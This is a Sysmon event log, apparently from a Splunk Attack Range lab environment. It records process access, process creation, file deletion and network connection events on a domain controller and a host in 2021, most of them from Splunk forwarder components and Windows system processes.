07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.907{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048058Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.908{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048057Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACAC17359E3EEAF8C457E1866E576D98,SHA256=2DEBA01571B672D4BF39EC6D1A9E101AF24DF8D7793321EF355B4247BE107274,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048056Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.454{466BC892-F45A-60EB-1C7D-00000000CF01}9286692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048055Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.222{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.208{466BC892-F45A-60EB-1C7D-00000000CF01}928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807303Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DBAE405366D05CF7D93D0CEB809729F,SHA256=F252E2854B4FDB62CE480A5EBB4C1899EEC601DB627507ADC0A9F7C2693B29EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:43.752{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51004-false10.0.1.12-8000- 10341000x80000000000000001048077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.806{466BC892-F45B-60EB-1E7D-00000000CF01}99966404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.607{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.591{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.592{466BC892-F45B-60EB-1E7D-00000000CF01}9996C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=177E524B8B5392BBDBC55A47B4C9A99A,SHA256=62D084D3D21590AB226E8EE9202078CE962D346CA6C743DB96D7F652FD8B2255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807302Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B379E6521A8CDF3E4E171AC1575CCB30,SHA256=939182739A5EF34F24BBE1ECF501F8651AB18DC188700691B23FAAB175A13080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807301Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA2A3D87FCC498E4A1862E14B62470BD,SHA256=EF4AF25EC464CD4F7E1EC833B639572A265425795BE493A4101F74DE2B2CFFA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807300Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:49.546{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-29730-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001048067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=014850D91F8C69BEAE80B855A07BB55D,SHA256=067A006DF47DB53D0442DFC2F73B461449768DC6E13E326C092E5F63A15865B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:51.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 